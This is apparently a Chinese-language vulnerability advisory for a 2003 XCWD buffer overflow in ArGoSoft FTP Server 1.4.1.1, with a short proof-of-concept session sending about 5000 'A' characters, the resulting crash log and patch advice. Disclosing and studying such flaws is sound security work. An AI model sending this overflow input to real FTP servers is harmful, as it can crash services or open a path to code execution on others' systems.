ArGoSoft FTP Server XCWD命令远程缓冲区溢出漏洞
发布日期:2003-09-25
更新日期:2003-10-08
受影响系统:ArGoSoft FTP Server 1.4.1.1
不受影响系统:ArGoSoft FTP Server 1.4.1.2
描述:
BUGTRAQ ID:
8704
ArGoSoft FTP Server是一款FTP服务程序。
ArGoSoft FTP在处理XCWD命令时缺少正确的缓冲区边界检查,远程攻击者可以利用这个漏洞以FTP进程权限在系统上执行任意指令。
攻击者提交包含4096个字节参数的XCWD命令给FTP服务程序,可导致触发缓冲区溢出,精心构建提交参数数据可能以FTP进程权限在系统上执行任意指令。
<*来源:moran zavdi (
moraniam@hotmail.com)
链接:
http://lists.insecure.org/lists/vuln-dev/2003/Sep/0059.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
moran zavdi (
moraniam@hotmail.com)提供了如下测试方法:
c:\> putty.exe localhost 21
220 ArGoSoft FTP Server for Windows NT/2000/XP, Version 1.4 (1.4.1.1)
user ftp
502 Unknown command
user ftp
331 User name OK, need password
pass ftp
230 User ftp logged in successfully **
XCWD AAAAAAA....(5000 times)
client closed connection.
the logs look like this:
9/22/2003 1:38:07 PM - FTP Server started. Listening on port 21
9/22/2003 1:38:34 PM - Requested FTP connection from 127.0.0.1 ID=1
9/22/2003 1:38:49 PM - ( 1) 'Error: Access violation at address 00401F32
in module 'ftpsrvnt.exe'. Write of address 41414145
建议:
厂商补丁:
ArGoSoft
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载升级程序至1.4.1.2版本:
http://www.argosoft.com/applications/ftpserver/download.asp浏览次数:4010
严重程度:0(网友投票)